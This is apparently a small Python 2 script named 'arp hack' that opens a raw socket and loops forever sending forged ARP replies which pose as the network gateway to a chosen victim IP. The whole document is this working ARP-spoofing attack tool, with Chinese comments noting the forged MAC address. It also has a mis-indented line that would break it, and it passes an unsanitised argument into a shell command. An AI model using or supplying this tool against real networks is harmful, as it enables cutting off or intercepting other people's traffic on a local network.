arp hack

arp.py

#coding:utf-8
import socket
import time
import os
import sys
from struct import pack

ARPOP_REQUEST = pack('!H', 0x0001)
ARPOP_REPLY = pack('!H', 0x0002)

ETHERNET_PROTOCOL_TYPE_ARP = pack('!H', 0x0806)
ARP_PROTOCOL_TYPE_ETHERNET_IP = pack('!HHBB', 0x0001, 0x0800, 0x0006, 0x0004)


def get_ip_mac(ip):
    cmd = "arp -n %s |tail -n 1 |awk '{print $3}' " % (ip,)
    return os.popen(cmd).read().strip()


def hack(hack_ip, gate_way_ip):

    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0806))
    sock.bind(("p3p1", socket.SOCK_RAW))
    # sock.bind(("en0", socket.SOCK_RAW))

    # 模拟网关发出arp应答
    sender_ip = pack('!4B', *[int(x) for x in gate_way_ip.split('.')])
    target_ip = pack('!4B', *[int(x) for x in hack_ip.split('.')])
    sender_mac = pack('!6B', *(0x11,)*6)#伪造的mac地址
    target_mac = pack('!6B', *(int(item, 16) for item in get_ip_mac(hack_ip).split(":")))

    count = 0
    arpframe = [
        # ## ETHERNET
        # destination MAC addr
        target_mac,
        # source MAC addr
        sender_mac,

        ETHERNET_PROTOCOL_TYPE_ARP,

        # ## ARP
        ARP_PROTOCOL_TYPE_ETHERNET_IP,
        # operation type
        ARPOP_REPLY,
        # sender MAC addr
        sender_mac,
        # sender IP addr
        sender_ip,
        # target hardware addr
        target_mac,
        # target IP addr
        target_ip,
    ]

    # send the ARP
    while 1:
      sock.send(''.join(arpframe))
      count += 1
      sys.stdout.write("\r 发送了{}个arp包".format(count))
        time.sleep(0.3)

if __name__ == '__main__':
    try:
        hack_ip = sys.argv[1]
        gate_way_ip = sys.argv[2]
    except IndexError:
        print "arp.py <hack_ip> <gate_way_ip>"
        sys.exit(1)
    hack(hack_ip, gate_way_ip)